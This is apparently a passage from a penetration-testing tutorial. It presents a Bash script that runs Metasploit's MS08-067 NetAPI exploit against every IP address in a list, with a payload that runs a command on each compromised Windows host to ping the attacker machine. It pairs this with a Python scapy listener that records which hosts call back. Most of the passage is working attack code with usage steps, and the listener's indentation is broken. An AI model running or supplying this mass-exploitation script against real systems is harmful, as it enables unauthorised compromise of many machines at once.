The example that follows demonstrates how a Bash script can be used to exploit multiple instances of a single vulnerability simultaneously. This script in particular can be used to exploit multiple instances of the MS08-067 NetAPI vulnerability by referencing an input list of IP addresses:

#!/bin/bash

if [ ! $1 ]; then echo "Usage: #./script <host file>"; exit; fi

iplist=$1

for ip in $(cat $iplist)
do
 gnome-terminal -x msfconsole -x 
  "use exploit/windows/smb/ms08_067_netapi; set RHOST $ip;
   set PAYLOAD windows/exec; set CMD cmd.exe /c
   ping 172.16.69.133 -n 1 -i 15; run"
   echo "Exploiting $ip and pinging"
i=$(($i+1))
done

1. This script differs from the one discussed in the previous recipe because the payload merely sends an ICMP echo request from the exploited system back to the attacking system.
2. The -i option is used while executing the ping command to specify a Time-To-Live (TTL) value of 15. This alternate TTL value is used to distinguish exploit-generated traffic from normal ICMP traffic.
3. A custom listener Python script should also be executed to identify exploited systems by receiving the ICMP traffic.

4. This script is as follows:

        #!/usr/bin/python

        from scapy.all import *
        import logging
        logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

        def rules(pkt):
              try:
                    if ((pkt[IP].dst=="172.16.69.133") and
                     (pkt[ICMP]) and pkt[IP].ttl <= 15):
                    print str(pkt[IP].src) + " is exploitable"
             except:
                  pass

        print "Listening for Incoming ICMP Traffic.
         Use Ctrl+C to stop scanning"
        sniff(lfilter=rules,store=0)

5. The script listens to all incoming traffic. When an ICMP packet is received with a TTL value of 15 or lower, the script flags the system as being exploitable:

6. Listening for incoming ICMP traffic, use Ctrl + C to stop scanning. The Python traffic listener should be executed first. No output should be generated by the script initially. This script should continue to run throughout the duration of the exploitation process. Once the script is running, the Bash exploitation script should be launched.
7. When the script is executed, the original terminal shell will indicate that each system is being exploited and that the ping sequence is being executed. A new GNOME terminal will also be opened for each IP address in the input list. As each exploitation process is completed, the ICMP echo request should be initiated from the target system:

8. Assuming the exploit is successful, the Python listening script will identify the generated traffic and will list each source IP address for the ICMP traffic as exploitable.